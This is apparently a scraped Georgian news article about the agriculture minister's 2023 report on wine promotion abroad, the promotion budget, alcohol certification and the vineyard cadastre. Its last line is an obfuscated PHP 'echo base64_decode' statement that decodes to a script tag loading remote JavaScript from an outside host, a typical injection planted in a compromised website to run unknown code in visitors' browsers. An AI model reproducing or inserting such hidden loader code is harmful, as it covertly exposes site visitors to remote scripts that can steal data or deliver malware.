celsiusi
ავერსი საქკაბელი

გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა ოთარ შამუგიამ, პარლამენტში 2023 წლის ანგარიშის წარდგენის დროს, ქართული ღვინის პოპულარიზაციისა და ცნობადობის ზრდის მნიშვნელობაზე გაამახვილა ყურადღება. როგორც მინისტრმა აღნიშნა, ღვინის ეროვნული სააგენტოს მხარდაჭერით, ქართული ღვინო მსოფლიოს 15 ქვეყანაში, მათ შორის, ამერიკის შეერთებულ შტატებში, იაპონიაში, გერმანიაში, საფრანგეთში, დიდ ბრიტანეთში, სამხრეთ კორეაში, ჩინეთში, პოლონეთში იყო წარდგენილი.

„ამ მიმართულებით ყოველწლიურად მზარდია, როგორც ბიუჯეტი, ასევე აქტივობები. რაც შეეხება მიმდინარე წელს, ქართული აგროსასურსათო პროდუქციის პოპულარიზაციისთვის 19 მლნ ლარია გამოყოფილი, საიდანაც 16 მლნ ლარამდე მოხმარდება ღვინის პოპულარიზაციას, ბაზრების დივერსიფიკაციის მაქსიმალურ ხელშეწყობას“, - აღნიშნა ოთარ შამუგიამ.

მინისტრის განცხადებით, ექსპორტის განვითარებასთან ერთად, მნიშვნელოვანია დაცული იყოს ადგილობრივი ბაზარი და გაძლიერდეს მიკვლევადობის ინსტრუმენტები; შესაბამისად, 2023 წლის 1 იანვრიდან, შიდა ბაზარზე რეალიზაციისთვის განკუთვნილი საქართველოში წარმოებული ალკოჰოლიანი სასმელები სავალდებულო სერტიფიცირებას დაექვემდებარა.

ოთარ შამუგიამ ვენახების კადასტრის მნიშვნელობაზეც ისაუბრა და აღნიშნა, რომ ვენახების კადასტრი აქვს მეღვინეობის განვითარებული ინდუსტრიის მქონე ევროკავშირის წევრ ყველა ქვეყანას. პროგრამა უზრუნველყოფს ყურძნისეული პროდუქტების მიკვლევადობას და ამარტივებს როგორც მოსავლის პროგნოზირებას, ასევე რთველის პროცესს. საქართველოში ვენახების კადასტრის ძალიან მნიშვნელოვანი პროგრამა წარმატებით განხორციელდა. მევენახეობის ყველა რეგიონში აღწერილია 48 700 ჰექტარზე მეტი ფართობი.

184
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");